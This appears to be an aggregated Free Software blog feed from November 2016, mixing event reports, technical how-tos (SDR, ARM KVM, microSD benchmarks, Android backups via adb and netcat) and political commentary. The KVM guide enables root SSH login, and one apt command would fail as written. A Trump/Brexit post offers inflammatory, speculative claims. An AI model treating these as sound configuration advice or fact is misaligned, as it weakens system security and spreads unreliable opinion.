On Saturday, André Ockers (NL translation coordinator), Maurice Verhessen (Coordinator Netherlands) and Niko Rikken from the Netherlands joined us to help at the booth and connect with people. Amusingly we again learnt that communication can be very confusing the shorter it is. While Matthias thought that he asked Maurice to bring a iron cloth hanger, Maurice thought he should bring a flat iron. Because he only had one (surprisingly), he asked Niko to bring his as well. While we wondered why Maurice only has one cloth hanger, our Dutch friends wondered why we would need two flat irons ;-)

Over the day, Matthias, Erik, and I gave our talks: Matthias spoke about common misconceptions about Free Software and how to clear them up, Erik explained how people can synchronise their computers and mobile phones with Free Software applications, and I motivated people to become politically active by presenting some lessons learned from my experiences with the Compulsory Routers and Radio Lockdown cases. There were many other talks by FSFE people, for example by Wolf-Dieter and Wolfgang. In the evening we enjoyed the social event with barbecue, free beer, and loooooong waiting queues.

Sunday was far more relaxed than the day before. We had time to talk to more people interested in Free Software and exchanged ideas and thoughts with friends from other initiatives. Among many others, I spoke with people from Freifunk, a Pirate Party politician, a tax consultant with digital ambitions, two system administrators, and a trade unionist. But even the nicest day has to end, and after we packed up the whole booth, merchandise and promotion material again, André took the remainders to the Netherlands where they will be presented to the public at FSFE’s T-DOSE booth.

Understanding what lies behind Trump and Brexit

DanielPocock.com - fsfe | 08:23, Wednesday, 09 November 2016

As the US elections finish, many people are scratching their heads wondering what it all means. For example, is Trump serious about the things he has been saying, or is he simply saying whatever was most likely to make a whole bunch of really stupid people crawl out from under their rocks to vote for him? Was he serious about winning at all, or was it just the ultimate reality TV experiment? Will he show up for work in 2017, or like Australia's billionaire Clive Palmer, will he set a new absence record for an elected official? Ironically, Palmer and Trump have both been dogged by questions over their business dealings, will Palmer's descent towards bankruptcy be replicated in the ongoing fraud trial against Trump University and similar scandals?

While the answer to those questions may not be clear for some time, some interesting observations can be made at this point.

The world has been going racist. In the UK, for example, authorities have started putting up anti-Muslim posters with an eery resemblance to Hitler's anti-Jew propaganda. It makes you wonder if the Brexit result was really the "will of the people", or were the people deliberately whipped up into a state of irrational fear by a bunch of thugs seeking political power?

Who thought The Man in the High Castle was fiction?

In January 2015, a pilot of The Man in the High Castle, telling the story of a dystopian alternative history where Hitler has conquered America, was the most-watched original series on Amazon Prime.

It appears Trump supporters have already been operating US checkpoints abroad for some time, achieving widespread notoriety when they blocked a family of British Muslims from visiting Disneyland in 2015. Ambushing them at the last moment as they were about to board their flight, it is unthinkable how anybody could be so cruel. When you reflect on statements made by Trump and the so-called "security" practices around the world, this would appear to be only a taste of things to come though.

Is it a coincidence that Brexit and Trump both happened in the same year that the copyright on Mein Kampf expired? Ironically, in the chapter on immigration Hitler specifically singles out the U.S.A. for his praise, is that the sort of rave review that Trump aspires to when he talks about making America great again?

US voters have traditionally held concerns about the power of the establishment. The US Federal Reserve has been in the news almost every week since the financial crisis, but did you know that the very concept of central banking was thrown out the window four times in America's history? Is Trump the type of hardliner who will go down this path again, or will it be business as usual? In his book Rich Dad's Guide to Investing in Gold & Silver, Robert Kiyosaki and Michael Maloney encourage people to consider putting most of their wealth into gold and silver bullion. Whether you like the politics of Trump and Brexit or not, are we entering an era where it will be prudent for people to keep at least ten percent of net wealth in this asset class again? Online dealers like BullionVault in Europe already appear to be struggling under the pressure as people rush to claim the free grams of bullion credited to newly opened accounts.

The Facebook effect

In recent times, there has been significant attention on the question of how Facebook and Google can influence elections, some European authorities have even issued alerts comparing this threat to terrorism. Yet in the US election, it was simple email that stole the limelight (or conveniently diverted attention from other threats), first with Clinton's private email server and later with Wikileaks exposing the entire email history of Clinton's chief of staff. The Podesta emails, while being boring for outsiders, are potentially far more damaging as they undermine the morale of Clinton's grass roots supporters. These people are essential for knocking on doors and distributing leaflets in the final phase of an election campaign, but after reading about Clinton's close relationship with big business, many of them may well have chosen to stay home. Will future political candidates seek to improve their technical competance, or will they simply be replaced by candidates who are born hackers and fluent in the language of a digital world?

Monday, 07 November 2016

Quickstart SDR with gqrx, GNU Radio and the RTL-SDR dongle

DanielPocock.com - fsfe | 19:56, Monday, 07 November 2016

Software Defined Radio (SDR) provides many opportunities for both experimentation and solving real-world problems. It is not exactly a new technology but it has become significantly more accessible due to the increases in desktop computing power (for performing the DSP functions) and simultaneous reduction in the cost of SDR hardware.

Thanks to the availability of a completely packaged gqrx and GNU Radio solution, you can now get up and running in less than half an hour and spending less than fifty dollars/pounds/euros.

We provided a full demo of the Debian Hams gqrx solution at Mini DebConf Vienna (video) and hope to provide a similar demo at MiniDebConf Cambridge on the coming weekend of 12-13 November.

gqrx is also available for Fedora users.

Choosing hardware

There are many different types of hardware, ranging from the low-cost RTL-SDR USB dongles to full duplex multi-transceiver systems.

My recommendation is to start with an RTL-SDR dongle due to extremely low cost, this will give you an opportunity to reflect on the opportunities of this technology before putting money into one of the transceivers and their accessories. The RTL-SDR dongle also benefits from being a small self-contained solution that you can carry around and experiment with or demo just about anywhere.

Important: Don't buy the cheapest generic RTL TV/radio receivers. It is absolutely essential to buy one of the units that has been explicitly promoted for SDR. These typically have a temperature compensated crystal oscillator (TCXO) which is absolutely essential for the reception of narrowband voice and digital signals. Without this, it is only possible to receive wideband broadcash FM radio and TV channels.

For those who want to try it out with us at MiniDebConf Cambridge, Technofix has UK stock (online ordering), they are about £26.

Getting gqrx up and running fast

Note: to avoid the wrong kernel module being loaded automatically, it is recoemmended that you don't connect the RTL-SDR dongle before you install the packages. If you did already connect it, you may need to reboot or rmmod dvb_usb_rtl28xxu.

If you are using a Debian jessie system, you can get all the necessary packages from jessie-backports.

If you haven't already enabled backports, you can do so with a command like this:


$ sudo echo "deb http://ftp.ch.debian.org/debian jessie-backports main" >> /etc/apt/sources.list

Make sure your local index is updated and then install the necessary packages:


$ sudo apt-get update
$ sudo apt-get install -t jessie-backports gqrx-sdr rtl-sdr

Running it for the first time

Once the packages are installed, connect the RTL-SDR dongle to the computer and then start the gqrx GUI from a terminal:


$ gqrx

If the GUI fails to appear, look carefully at the error messages. It may be that the wrong kernel module has been loaded.

The properties window appears, select the RTL-SDR dongle:

Now the main screen will appear. Choose the wideband FM mode "WFM (mono)" and change the frequency to a value in the FM broadcast band such as 100MHz. Click the "Power on" button in the top left corner, just under the "File" menu, to start reception. Click in the middle of a strong signal to tune to that station. If you don't hear anything, check the squelch setting (it should be more negative than the signal strength value) and increase the Gain control at the bottom right hand side of the window.

Looking for ham / amateur radio signals

A popular band for hams is between 144 - 148 MHz (in some countries only a subset of this band is used). This is referred to as the two-meter band, as that is the wavelength at this frequency.

Hams often use the narrowband FM mode in this band, especially with repeater stations. Change the "Mode" setting from "WFM" to "Narrow FM" and change the frequency to a value in the middle of the band. Look for signals in the radio spectrum and click on them to hear them.

If you are not sure which part of the band to look in, search for the two-meter band plan for your country/region and look for the repeater output frequencies in the band plan.

Sunday, 06 November 2016

KVM virtualization with Allwinner A20 on Debian: libre, low-power, low-cost

Daniel's FSFE blog | 14:33, Sunday, 06 November 2016

Introduction

Various cheap ARM boards based on the Allwinner A20 SoC are available already for a few years. The first EOMA68 computer [1] will be also based on this chipset. Not many users know that the Allwinner A20 supports hardware-supported virtualization as well. Its Cortex A7 cores allow running hardware-accelerated ARM virtual machines (guests) using KVM or Xen.

While Allwinner has been blamed to violate the GPL for years [2], their A20 SoC is imho one of the best choices today when it comes to building a small and libre server for SOHO use (thanks to the hard work of the Allwiner-independent Linux-Sunxi community). While many SoCs found on popular boards like those from the Raspberry Pi family require proprietary blobs, the A20 works with a free bootloader and requires no proprietary drivers or firmware for basic operation.

The virtualization on A20 hosts works out of the box on Debian Jessie with the stock kernel and official packages in main — without cross-compiling, patching or other tinkering (this was not the case in the past, see [3]). This also means that updating your host and guests later will be easy and painless. Creating and managing guests can be done with virt-manager [4] – a secure and comfortable graphical user interface licensed under GPLv3.

After first discussing some A20 hardware options, this guide takes the example of the Olimex “A20-OLinuXIno-LIME2″ board [5] and shows how to turn it into a virtualization host. Then shows how create and manage guest-VMs on the virtualization host. The guide assumes that you are running a a GNU/Linux-based desktop system from which you want to manage the A20 device.

Disclaimer


All data and information provided in this article is for informational purposes only. The author makes no representations as to accuracy, completeness, currentness, suitability, or validity of any information on this article and will not be liable for any errors, omissions, or delays in this information or any losses, injuries, or damages arising from its display or use. All information is provided on an as-is basis.

In no event the author we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this article.

Hardware choices

There are plenty of boards with the Allwinner A20. However, only few are known to work out of the box on Debian Jessie. The particular page on the Debian Wiki [6] mentions the following boards in particular:

  • Cubietech Cubieboard2
  • Cubietech Cubieboard3 (“Cubietruck”)
  • LeMaker Banana Pro
  • Olimex A20-OLinuXino-LIME
  • Olimex A20-OLinuXino-LIME2 (only the regular one, not the eMMC variant!)
  • Olimex A20-Olinuxino Micro

While some of these boards feature Gigabit ethernet and SATA, only the Cubieboard 3 has 2 GB of RAM. To me, this seems to be the best choice for a A20-based KVM virtualization host. Since I only had a spare Olimex A20-OLinuXino-LIME2 board at hand, this guide uses this board as example.

Beware: The “A20-OLinuXino-LIME2″ and the “A20-OLinuXino-LIME2-eMMC” are not the same! Debian provides no firmware for the “A20-OLinuXino-LIME2-eMMC” and I could not get it to work at all on Debian. Although I thought that they would be the same except for the eMMC flashg, the firmware for the regular “”A20-OLinuXino-LIME2″ did NOT work for me at all!

Base installation

The article in the Debian wiki provides the necessary information on installing Debian Jessie using the text-based Debian-Installer. Make sure you have a microSD card with a good 4K random I/O performance or the installation will take forever and your A20 system will run terribly slow afterwards (see my article comparing performance of various microSD cards).

If you don’t have a serial cable and want to install using the HDMI output, you need to use the installer images from unstable. The easiest way to do is to fetch the firmware file from unstable and the partition image from Jessie. Then write them to your microSD card (replace /dev/sdX with your particular device):

$ zcat firmware.A20-OLinuXino-Lime2.img.gz partition.img.gz > /dev/sdX

Next, insert the microSD card into your device, connect your device to your LAN and power it up. Then install Debian as usual using the text-based installer. During the installation, sure to create a root account (needed for KVM) and a ext2 boot partition (the safest method here is to use the guided installer). When tasksel gets called, make sure to install the tasks/packages “SSH Server” and “Standard system utilities”.

Note for users of the German mirrors: Using the mirror “ftp.de.debian.org” will break your installation as something seems to be missing there as of 2016-11-05. Using “ftp2.de.debian.org” works fine.

Installing the KVM virtualization

By default, interactive root logins are not allowed on Debian. Therefore, make sure you copy over your SSH public key to your a20-box or simply enable interactive root logins over SSH by changing the following option in /etc/ssh/sshd_config:

#PermitRootLogin without-password
PermitRootLogin yes

Then restart the SSH server:

# service ssh restart

Now you should be able to log in directly as root. Next, install the virtualization packages:

# apt install libvirt-daemon-system
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:

...

0 upgraded, 105 newly installed, 0 to remove and 0 not upgraded.
Need to get 44.4 MB of archives.
After this operation, 182 MB of additional disk space will be used.
Do you want to continue? [Y/n]

Now fire up virt-manager on your desktop and make sure you can connect to your a20-box:

Creating and installing a guest

For running ARM virtual machines you need a kernel and DTBs which support the VExpress-A15 chipset (the ARM reference board usually emulated on ARM). This is already provided in stock Debian, so there is no need to compile anything yourself.

Regarding the guest, you can choose any Linux you want. In the following example, we will install a Debian Jessie guest using the Debian installer. Therefore we need to download the to the Virtualization host. This time, we don’t need a partition image but can use the usual the initrd installer-Image from the Debian server. SSH into the virtualization host and download it:

wget http://ftp.uk.debian.org/debian/dists/jessie/main/installer-armhf/current/images/netboot/initrd.gz -O initrd-installer-jessie.gz

For the installation, you will also need a different kernel because in the Kernel installed on the host the network drivers are in initrd, but the Installer’s initrd assumes they are in the kernel. Therefore, fetch a kernel for the installer:

wget http://ftp.uk.debian.org/debian/dists/jessie/main/installer-armhf/current/images/netboot/vmlinuz -O vmlinuz-installer-jessie

Now, fire up virt-manager on your desktop and connect to the Virtualization host. Then, start the wizard for creating guests using “create new virtual machine”. On the first screen, change the machine type to “vexpress-a15″:

On the next screen, specify a storage (just create one using the dialog following “Browse”), and also use “Browse” to locate the kernel and initrd images so you specify the ones we just downloaded. For the DTB, we’ll use the one that is part of Debian’s stock kernel and resides under /usr/lib/linux-image-3.16.0-4-armmp-armmp-lpae/vexpress-v2p-ca15-tc1.dtb (make sure it corresponds to the version on your a20-host! TODO: Is there any symlink which points to the current version?)). The kernel args are also very important, or you will not get any output. For this line, specify the following:

root=/dev/vda1 console=ttyAMA0,115200 rootwait

Finally, select OS type and version appropiately. Your dialog should look like this:

Then, specify RAM (e.g. 256MB) and the number of CPUs (e.g. 1) you want to give the guest and jump to the last screen. Here, give your guest a nice name and make sure you check the “Customize configuration before install” checkbox before you click “Finish”:

Otherwise, you would end up with an error message like this:

Unable to complete install: 'internal error: early end of file from monitor: possible problem:
kvm_init_vcpu failed: Invalid argument

In the configuration of the VM, under “Processor”, change the configuration from “Hypervisor Default” to “Application Default”:

To get better performance, also change the BUS of your virtual disk to “VIRTIO” (by default, it would emulate an SD card):

And do the same for the network adapter:

Finally, fire up the guest using “Begin installation”. If everything goes fine, you should see the kernel boot and be presented with the welcome screen of the installer. For jessie, it should look like this:

If you selected the kernel and initrd from stretch/sid you should get a nicer color screen (make sure you set the baudrate of the console to 115200 or you will get a disorted output!):

When partitioning the guest, just create a single root partition spanning the whole (virtual) device. The guest will always boot using externally specified kernels, dtbs and initrds, therefore there is no use in creating a /boot partition as the “guided install” would do.

Near the end of the installation, you will be notified that no bootloader could be installed. You can safely ignore this message:

After finishing the installation, the system will boot again into the installer because the initrd is still active. To change this, power off the guest (“Force Off”) and specify in the boot options to use the kernel and initrd image of your A20 host instead (whenever they will be updated on the host, the guests will also get the update on their next boot):

Now your guest should finally succeed to boot up:

And you can check that it indeed uses the current A20 kernel on the host and virtualizes the VExpress15 SoC:

Benchmarks

Finally, I want to provide some benchmarks so you can get a feeling about the impact of the virtualization. The benchmarks were done using a guest with 2 CPUs and 512MB memory assigned.

IO/Performance

For a first I/O benchmark, I used hdparm.

On the host:

$ hdparm -tT /dev/mmcblk0
/dev/mmcblk0:
 Timing cached reads:   814 MB in  2.00 seconds = 406.33 MB/sec
 Timing buffered disk reads:  66 MB in  3.01 seconds =  21.93 MB/sec

On the guest:

$ hdparm -tT /dev/vda
/dev/vda:
 Timing cached reads:   694 MB in  2.00 seconds = 346.49 MB/sec
 Timing buffered disk reads:  30 MB in  3.15 seconds =   9.52 MB/sec

CPU processing

For benchmarking processing, I used the openssl suite to do a few simple AES benchmarks:

$ openssl speed aes

On the host:

...
The 'numbers' are in 1000s of bytes per second processed.
type             16 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
aes-128 cbc      20267.83k    22390.70k    23325.10k    23575.89k    23642.11k
aes-192 cbc      17594.13k    19464.20k    19956.57k    20102.83k    20146.86k
aes-256 cbc      15727.25k    17158.89k    17592.58k    17706.67k    17738.41k

On the guest:

...
The 'numbers' are in 1000s of bytes per second processed.
type             16 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
aes-128 cbc      19784.01k    22100.48k    22697.56k    23272.20k    23288.29k
aes-192 cbc      17363.72k    19097.02k    19643.68k    19786.41k    19800.53k
aes-256 cbc      15455.28k    16939.28k    17374.44k    17415.85k    17504.58k

Conclusion

With one of the Allwinner A20 boards supported by Debian, you can easily build a tiny virtualization host that can handle a few simple VMs and draws only 2-3W of power. While this process was pretty cumbersome in the past (you had to cross-compile kernels etc.), thanks to the efforts of the Debian project and Linux-Sunxi community, it is now pretty straight-forward with only few caveats involved. This might also be an interesting option if you want to run a low-power virtualization cluster on fully libre software down to the firmware level.

References

[1] https://www.crowdsupply.com/eoma68/micro-desktop
[2] http://linux-sunxi.org/GPL_Violations
[3] http://blog.flexvdi.com/2014/07/28/enabling-kvm-virtualization-on-arm-allwinner-a20/
[4] https://virt-manager.org/
[5] https://www.olimex.com/Products/OLinuXino/A20/A20-OLinuXIno-LIME2/
[6] https://wiki.debian.org/InstallingDebianOn/Allwinner

Saturday, 05 November 2016

Benchmarking microSD cards

Daniel's FSFE blog | 18:56, Saturday, 05 November 2016

Motivation

If you ever tried using a microSD for your root or home filesystem on a small computing device or smartphone, you probably have noticed that microSD cards are in most cases a lot slower than integreted eMMC flash. Since most filesystems use 4k blocks, the random write/read performance using 4k blocks is what matters most in such scenarios. And while microSD cards don’t come close to internal flash in these disciplines, there are significant differences between the models.

Jeff Geerling [1,2] has already benchmarked the performance of various microSD cards on different models of the “blobby” Raspberry Pi. I had a number of different microSD cards at hand and I tried to replicate his results on my sample.

Disclaimer


All data and information provided in this article is for informational purposes only. The author makes no representations as to accuracy, completeness, currentness, suitability, or validity of any information on this article and will not be liable for any errors, omissions, or delays in this information or any losses, injuries, or damages arising from its display or use. All information is provided on an as-is basis.

In no event the author we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this article.

Environment and tools

Just like Jeff, I used the open source (but non-free) tool “iozone” [3] in the current stable version that is available on Debian Jessie (3.429). Instead of using a Raspberry Pi, I used a cheap microSD/SD-USB2.0-adapter made by Logilink [4] connected to a desktop pc.

I disabled caches and benchmarked on raw devices to avoid measuring filesystem overhead. Therefore, I used the following call to iozone to run the benchmarks (/dev/sde is my sdcard):

$ iozone -e -I -a -s 100M -r 4k -r 512k -r 16M -i 0 -i 1 -i 2 -f /dev/sde

Benchmarked microSD cards and results

The following table provides the results I obtained (rounded to 10kb/s):

Manufacturer Make / model Rating Capacity 16M seq. read (MB/s) 16M seq. write (MB/s) 4K rand. read (MB/s) 4K rand. write (MB/s)
Adata ? C4 32 GB 9.58 2.97 2.62 0.64
Samsung Evo UHS-1 32 GB 17.80 10.13 4.45 1.32
Samsung Evo+ UHS-1 32 GB 18.10 14.27 5.28 2.86
Sandisk Extreme UHS-3 64 GB 18.44 11.22 5.20 2.36
Sandisk Ultra C10 64 GB 18.16 8.69 3.73 0.80
Toshiba Exceria UHS-3 64 GB 16.10 6.60 3.82 0.09
Kingston ? C4 8 GB 14.69 3.71 3.97 0.18

Discussion, conclusion and future work

I can confirm Jeff’s results about microSD cards and would also recommend the Evo+ which has the best 4K random write performance of the sample. On the other hand, I am very disappointed about the Toshiba Exceria card. Actually running a device on this card with a very sluggish performance was the reason why I took this benchmark initiative. And indeed, after switching to the Evo+, the device feels much snappier now.

I think it would be interesting to add more cards to this benchmark (not only microSD but also regular SD cards and maybe also CF cards). Also, using fio instead of the non-free iozone might be interesting. Furthermore, doing the benchmarks internally on the device or using a faster USB 3.0 card reader might be also interesting.

References

[1] http://www.pidramble.com/wiki/benchmarks/microsd-cards
[2] http://www.jeffgeerling.com/blogs/jeff-geerling/raspberry-pi-microsd-card
[3] http://www.iozone.org/
[4] http://www.logilink.eu/Products_LogiLink/Notebook-Computer_Accessories/Card_Reader/Cardreader_USB_20_Stick_external_for_SD-MMC_CR0015.htm

Thursday, 03 November 2016

PATHspider Plugins

Iain R. Learmonth | 23:46, Thursday, 03 November 2016

This post is cross-posted on the MAMI Project blog here.

In today’s Internet we see an increasing deployment of middleboxes. While middleboxes provide in-network functionality that is necessary to keep networks manageable and economically viable, any packet mangling — whether essential for the needed functionality or accidental as an unwanted side effect — makes it more and more difficult to deploy new protocols or extensions of existing protocols.

For the evolution of the protocol stack, it is important to know which network impairments exist and potentially need to be worked around. While classical network measurement tools are often focused on absolute performance values, PATHspider performs A/B testing between two different protocols or different protocol extensions to perform controlled experiments of protocol-dependent connectivity problems as well as differential treatment.

PATHspider 1.0.1 has been released today and is now available from GitHub, PyPI and Debian unstable. This is a small stable update containing a documentation fix for the example plugin.

PATHspider now contains 3 built-in plugins for measuring path transparency to explicit congestion notification, DiffServ code points and TCP Fast Open. It’s easy to write your own plugins, and if they’re good enough, they may be included in the PATHspider distribution at the next feature release.

We have a GitHub repository you can fork that has a premade directory structure for new plugins. You’ll need to implement logic for performing the two connections, for the A and the B tests. Once you’ve verified your connection logic is working with Wireshark, you can move on to writing Observer functions to analyse the connections made in real time as PATHspider runs. The final step is to merge the results of the connection logic (e.g. did the operating system report a timeout?) with the results of your observer functions (e.g. was ECN successfully negotiated?) and write out the final result.

We have dedicated a section of the manual to the development of plugins and we really see plugins as first-class citizens in the PATHspider ecosystem. While future releases of PATHspider may contain new plugins, we’re also making it easier to write plugins by providing reusable library functions such as the tcp_connect() function of the SynchronisedSpider that allows for easy A/B testing of TCP connections with any globally configured state set. We also provide reusable observer functions for simple tasks such as determining if a 3-way handshake completed or if there was an ICMP unreachable message received.


If you’d like to check out PATHspider, you can find the website at https://pathspider.net/.

Current development of PATHspider is supported by the European Union’s Horizon 2020 project MAMI. This project has received funding from the European Union’s Horizon 2020 research and innovation programme under grant agreement No 688421. The opinions expressed and arguments employed reflect only the authors’ view. The European Commission is not responsible for any use that may be made of that information.

Wednesday, 02 November 2016

Backing up and restoring data on Android devices directly via USB (Howto)

Daniel's FSFE blog | 21:28, Wednesday, 02 November 2016

Motivation

I was looking for a simple way to backup data on Android devices directly to a device running GNU/Linux connected over a USB cable (in my case, a desktop computer).

Is this really so unique that it’s worth writing a new article about it? Well, in my case, I did not want to buffer the data on any “intermediate” devices such as storage cards connected via microSD or USB-OTG. Also, I did not want to use any proprietary tools or formats. Instead, I wanted to store my backups in “oldschool” formats such as dd-images or tar archives. I did not find a comprehensive howto for that, so I decided to write this article.

Disclaimer


All data and information provided in this article is for informational purposes only. The author makes no representations as to accuracy, completeness, currentness, suitability, or validity of any information on this article and will not be liable for any errors, omissions, or delays in this information or any losses, injuries, or damages arising from its display or use. All information is provided on an as-is basis.

In no event the author we be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of, or in connection with, the use of this article.

Overview

This article describes two different approaches. Both have their pros and cons:

  • Block-level: Doing 1:1 block-level backups (above the file system) is an imaging approach that corresponds to doing dd-style backups.
  • Filesystem-level: Doing filesystem-level backups (on the file system) corresponds to tar-style backups.

An important factor when doing backups is also performance. Filesystem-level backups are usually faster on block devices which are only filled up to a small degree. However, due to the file system overhead they have a lower “raw” throughput rate — especially when backing up data on flash media such as microSD cards. Here, typical filesystems such as ext4 or f2fs operating with a 4K block size are a major bottleneck as these media often have horrible 4k write/read performance.

The following instructions for applying these approaches assume that you already have a “liberated” Android device which can boot into TWRP (a free Android recovery) or CWM. I am using the example of a Nexus-S running Replicant 4.2.0004 and TWRP 2.8.7.0, but the approaches also work with most other Android distributions and recoveries.

Getting familiar with the block devices on your Android device

First of all, you should know which block device you actually want to backup. The internal flash on Android devices is usually partitioned in about 15-25 partitions, depending on the device. To get a first overview, you can try the following (I am using adb shell on the desktop):

$ adb shell cat /proc/partitions

major minor #blocks name

31 0 2048 mtdblock0
31 1 1280 mtdblock1
31 2 8192 mtdblock2
31 3 8192 mtdblock3
31 4 480768 mtdblock4
31 5 13824 mtdblock5
31 6 6912 mtdblock6
179 0 15552512 mmcblk0
179 1 524288 mmcblk0p1
179 2 1048576 mmcblk0p2
179 3 13978607 mmcblk0p3
179 16 1024 mmcblk0boot1
179 8 1024 mmcblk0boot0

To find out what the partitions are about you can inspect the directory /dev/block/platform//by-Name/ which contains symlinks to the actual partitions. In my case, the Nexus-S has two flash chips and I am listing the partitions of the one where the userdata-partition resides on:

$ adb shell ls -l /dev/block/platform/s3c-sdhci.0/by-name

lrwxrwxrwx root root 2016-11-02 19:51 media -> /dev/block/mmcblk0p3
lrwxrwxrwx root root 2016-11-02 19:51 system -> /dev/block/mmcblk0p1
lrwxrwxrwx root root 2016-11-02 19:51 userdata -> /dev/block/mmcblk0p2

Please note that unlike the Nexus-S, most newer Android devices only have a single eMMC flash chip and don't use MTD devices anymore.

Block-level approach

Block-level backups take up a lot of space (without compression) and extracting single files is cumbersome (especially when talking about encrypted data partitions or backups of the whole flash). On the other hand, "just" restoring a full backup is easy.

Backing up a single partition

Now that you know which block devices you want to backup, you can directly create a 1:1 image via adb pull as you would normally do by using dd. In our case:

$ adb pull /dev/block/platform/s3c-sdhci.0/by-name/userdata

7942 KB/s (1073741824 bytes in 132.027s)

On your workstation, you will obtain a file named userdata which contains the whole partition/filesystem as an image. If you didn't enable encryption on your Android device, you can directly mount this file as loopback device and access its contents:

$ mount userdata /mnt

Restoring a single partition


BE CAREFUL! RESTORING THE WRONG IMAGE OR WRITING TO THE WRONG BLOCK DEVICE CAN RUIN YOUR DATA OR EVEN BRICK YOUR ANDROID DEVICE!

To restore your backup, you can simply use adb push. In my case:

$ adb push userdata /dev/block/platform/s3c-sdhci.0/by-name/userdata

failed to copy 'userdata' to '/dev/block/platform/s3c-sdhci.0/by-name/userdata': No space left on device

Alternative: Operating on the whole block device

Instead of backing up just a single partition, it is also possible to backup the whole flash device including all partitions. Example:

$ adb pull /dev/block/mmcblk0

Remarks:

  • On some devices, not all partitions are readable and, thus, cannot be backed up.
  • Please be careful with restores!
  • Accessing files inside this image is not straight-forward (but doable).

Filesystem-level approach

Filesystem-level backups only work for single partitions, take up as much space as the files on the particular filesystem you backup and it is easy to access individual files in them. I am using a combination of adb, netcat and tar to create and restore these backups.

Backing up your data

First, connect to your device via an adb shell:

$ adb shell

Then, change to the directory from where you want to create your backup. If your device was not automatically mounted, you have to do it first:

# mount /dev/block/platform/s3c-sdhci.0/by-name /data

Now change to this directory:

# cd /data

Now, start the netcat process:

# tar -cvp . | busybox nc -lp 5555

On the receiver side (desktop), set up adb port forwarding:

$ adb forward tcp:4444 tcp:5555

Then, start the process to receive the tar file:

$ nc -w 10 localhost 4444 > userdata.tar

You should see your files being packed up on the Android side:

./
./lost+found/
./dontpanic/
./misc/
./misc/adb/
./misc/audit/
./misc/audit/audit.log
...

Now wait for the process to exit.

Restoring your data

Again, on your receiver side (Android device), mount /data if it was not mounted yet and change in there:

# mount /dev/block/platform/s3c-sdhci.0/by-name /data
# cd /data

Now, start the tar extraction process:

# busybox nc -lp 5555 | tar -xpvf -

On the sender side (desktop), again, set up adb port forwarding:

$ adb forward tcp:4444 tcp:5555

And send the tar file:

$ cat userdata.tar | nc -q 2 localhost 4444

Now you should be able to see your previously backed up files getting restored...

References

For the filesystem-level part of the article I used and adapted the following sources:

  • http://www.screenage.de/blog/2007/12/30/using-netcat-and-tar-for-network-file-transfer/
  • http://stackoverflow.com/questions/15278587/pipe-into-adb-shell

Tuesday, 01 November 2016

Adoption of Free Software PDF readers in Italian Regional Public Administrations (third monitoring)

Tarin Gamberini | 09:30, Tuesday, 01 November 2016

The following monitoring shows that, in the last semester, ten Italian Regions have reduced advertisement about proprietary PDF readers on their website, and that a Region has raised its support to Free Software PDF readers.

Continue reading →

Monday, 31 October 2016

EIF v.3. – citizens demand for more Free Software, while businesses seek to promote true Open Standards

polina's blog | 16:35, Monday, 31 October 2016

As reported earlier, the European Commission (EC) is currently revising the European Interoperability Framework, a set of guidelines, recommendations and standards for the EU e-governmental services. In the end of June 2016, the EC closed its 12 weeks long open public consultation. The FSFE provided its answers to the EC where we highlighted the need for promotion of Open Standards and Free Software – key enablers of interoperability.

According to the recently published Factual Summary of the contributions received by the EC, we were not the only ones to see the plausible effect of Free Software and Open Standards to the interoperability in the EU public sector. The majority of the respondents identified “the use of proprietary IT solutions by public administrations, often creating a situation of vendor lock-in” to be a problem for interoperability in the EU.

According to the analysis, the majority of the comments raised by citizens on the draft EIF were related to:

“the need for openness (i.e. open data, open standards, open file formats, open source projects) and transparency.”

The additional action that was suggested to be included in the revised strategy by business/private organisations was to:

“promote the use of (true) open standards and support of standards in new technologies”.

We hope the European Commission will include the wishes of EU citizens and businesses and will follow them when revising the EIF.


Image Open by opensource.com, CC BY-SA 2.0.

Sunday, 30 October 2016

Powers to Investigate

Iain R. Learmonth | 00:17, Sunday, 30 October 2016

The Communication Data Bill was draft legislation introduced first in May 2012. It sought to compel ISPs to store details of communications usage so that it can later be used for law enforcement purposes. In 2013 the passage of this bill into law had been blocked and the bill was dead.

In 2014 we saw the Data Retention and Investigatory Powers Act 2014 appear. This seemed to be in response to the Data Retention Directive being successfully challenged at the European Court of Justice by Digital Rights Ireland on human rights grounds, with a judgment given in 2014. It essentially reimplemented the Data Retention Directive along with a whole load of other nasty things.

The Data Retention and Investigatory Powers Act contained a sunset clause with a date set for 2016. This brings us to the Investigatory Powers Bill which it looks will be passing into law shortly.

Among a range of nasty powers, this legislation will be able to force ISPs to record metadata about every website you visit, every connection you make to a server on the Internet. This is sub-optimal for the privacy minded, with my primary concern being that this is a treasure trove of data and it’s going to be abused by someone. It’s going to be too much for someone to resist.

The existence of this power in the bill seemed to confuse the House of Lords:

It is not for me to explain why the Government want in the Bill a power that currently does not exist, because internet connection records do not exist, and which the security services say they do not want but which the noble and learned Lord says might be needed in the future. It is not for me to justify this power; I am saying to the House why I do not believe it is justified. The noble and learned Lord and the noble Lord, Lord Rosser, made the point that this is an existing power, but how can you have an existing power to acquire something that will not exist until the Bill is enacted?

– Lord Paddick (link)

Of course, the internet connection records are meaningless when your traffic is routed via a proxy or VPN, and there is a Kickstarter in progress that I would love to succeed: OnionDSL.

The premise of OnionDSL is that instead of having an IPv4/IPv6 connection to the Internet, you join a private network that does not provide any routing to the global Internet and instead provides only a Tor bridge. I cannot think of anything that I do from home that I cannot do via Tor and have been considering switching to Qubes OS as the operating system on my day-to-day laptop to allow me to direct basically everything through Tor.

The idea of provisioning a non-IP service via DSL is not new to me, I’ve come across it before with cjdns which provides an encrypted IPv6 network using public key cryptography for network address allocation and a distributed hash table for routing. Peering between cjdns nodes can be performed over Ethernet and cjdns over Ethernet could be provisioned in place of the traditional PPP over Ethernet (PPPoE) to provide access directly to cjdns without providing any routing to the global Internet.

If OnionDSL is funded, I think it’s very likely I would be considering becoming a customer. (Assuming the government doesn’t attempt to also outlaw Tor).

Saturday, 29 October 2016

live-wrapper 0.4 released!

Iain R. Learmonth | 03:21, Saturday, 29 October 2016

